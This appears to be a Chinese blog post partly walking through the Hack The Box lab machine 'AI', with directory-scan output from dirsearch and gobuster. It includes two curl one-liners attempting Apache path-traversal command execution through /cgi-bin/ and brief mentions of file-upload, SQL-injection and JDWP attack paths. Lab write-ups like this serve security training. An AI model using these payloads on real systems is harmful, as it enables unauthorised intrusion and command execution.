HTB AI

Posted on Edited on In

第一个靶机 拿来练手

初步测试

怎么说 拿到一个网站 第一步?

扫!Burp上!!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
[14:00:54] 403 -  277B  - /.ht_wsr.txt
[14:00:54] 403 -  277B  - /.htaccess.bak1
[14:00:54] 403 -  277B  - /.htaccess.orig
[14:00:54] 403 -  277B  - /.htaccess.sample
[14:00:54] 403 -  277B  - /.htaccess.save
[14:00:54] 403 -  277B  - /.htaccess_orig
[14:00:54] 403 -  277B  - /.htaccess_extra
[14:00:54] 403 -  277B  - /.htaccess_sc
[14:00:54] 403 -  277B  - /.htaccessBAK
[14:00:54] 403 -  277B  - /.htaccessOLD
[14:00:54] 403 -  277B  - /.htaccessOLD2
[14:00:55] 403 -  277B  - /.htm
[14:00:55] 403 -  277B  - /.html
[14:00:55] 403 -  277B  - /.htpasswds
[14:00:55] 403 -  277B  - /.htpasswd_test
[14:00:55] 403 -  277B  - /.httr-oauth
[14:00:58] 403 -  277B  - /.php
[14:01:16] 200 -   37KB - /about.php
[14:01:45] 200 -    0B  - /db.php
[14:01:45] 200 -   36KB - /contact.php
[14:01:55] 301 -  313B  - /images  ->  http://10.10.10.163/images/
[14:01:55] 403 -  277B  - /images/
[14:01:57] 200 -   36KB - /index.php/login/
[14:01:57] 200 -   36KB - /index.php
[14:02:19] 403 -  277B  - /server-status
[14:02:19] 403 -  277B  - /server-status/
[14:02:28] 301 -  314B  - /uploads  ->  http://10.10.10.163/uploads/
[14:02:28] 403 -  277B  - /uploads/

扫了后 好像没啥值得注意的

apache漏洞

看看有没有什么可以搞的点

image-20220709140818934

首先扫出来了一个 Apache 的版本 2.4.29 查查

貌似有两个漏洞

路径穿越漏洞

1
curl http://10.10.10.163/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id'
1
curl --data "echo;id" 'http://10.10.10.163/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

image-20220709143825503

但貌似木有。。。咳咳咳 应该是这个/cgi-bin/ 导致的?搞完再回头看一下

文件上传

另一个文件上传的点 我打定了

Apache HTTPD 换行解析漏洞分析与复现(CVE-2017-15715) - FreeBuf网络安全行业门户

研究了一会 但是如果不用wav文件的话没回显 很难下手。

还是要想办法找到一个wav文件来

(之前扫的时候好像还扫出来了一个疑似sql注入

小插曲

dirb kali自带的扫描工具 比dirsearch靠谱一点

https://www.kali.org/tools/dirb/

测试的wordlists的位置 /usr/share/wordlists (kali自带)

image-20220709155919766

1
dirb http://10.10.10.163/ /usr/share/wordlists/dirb/common.txt
1
gobuster dir -u http://10.10.10.163/ -w /usr/share/wordlists/dirb/common.txt -x php

重新扫描的结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(kali㉿kali)-[~/Desktop/fuxploider-master]
└─$ gobuster dir -u http://10.10.10.163/ -w /usr/share/wordlists/dirb/common.txt -x php 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.163/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2022/07/09 04:03:36 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.hta.php             (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess.php        (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/about.php            (Status: 200) [Size: 37503]
/contact.php          (Status: 200) [Size: 37371]
/db.php               (Status: 200) [Size: 0]    
/images               (Status: 301) [Size: 313] [--> http://10.10.10.163/images/]
/index.php            (Status: 200) [Size: 37347]                                
/index.php            (Status: 200) [Size: 37347]                                
/intelligence.php     (Status: 200) [Size: 38674]                                
Progress: 6426 / 9230 (69.62%)                                                  [ERROR] 2022/07/09 04:06:39 [!] Get "http://10.10.10.163/ppc.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/server-status        (Status: 403) [Size: 277]                                  
Progress: 8238 / 9230 (89.25%)                                                  [ERROR] 2022/07/09 04:07:33 [!] Get "http://10.10.10.163/TEMP.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2022/07/09 04:07:33 [!] Get "http://10.10.10.163/templ.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 8326 / 9230 (90.21%)                                                  [ERROR] 2022/07/09 04:07:36 [!] Get "http://10.10.10.163/texts.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/uploads              (Status: 301) [Size: 314] [--> http://10.10.10.163/uploads/]
Progress: 9228 / 9230 (99.98%)                                                   [ERROR] 2022/07/09 04:08:09 [!] Get "http://10.10.10.163/xmlrpc_server.php.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
                                                                                  
===============================================================
2022/07/09 04:08:09 Finished
===============================================================

可以看到还有一个页面比较重要 /intelligence.php (Status: 200) [Size: 38674]

看一下

image-20220709161121838

折磨

这就是一个 sql注入点 。。。 但是有点刁钻 。。。

你要先把语音转成文字 再让他转回来 哭

这一部分我真的不想去翻译了 555

ffmpeg 将 mp3 转化为 wav

之后是打一个 JDWP GitHub - IOActive/jdwp-shellifier

实在不想做下去了 散会

reference

https://0xrick.github.io/hack-the-box/ai/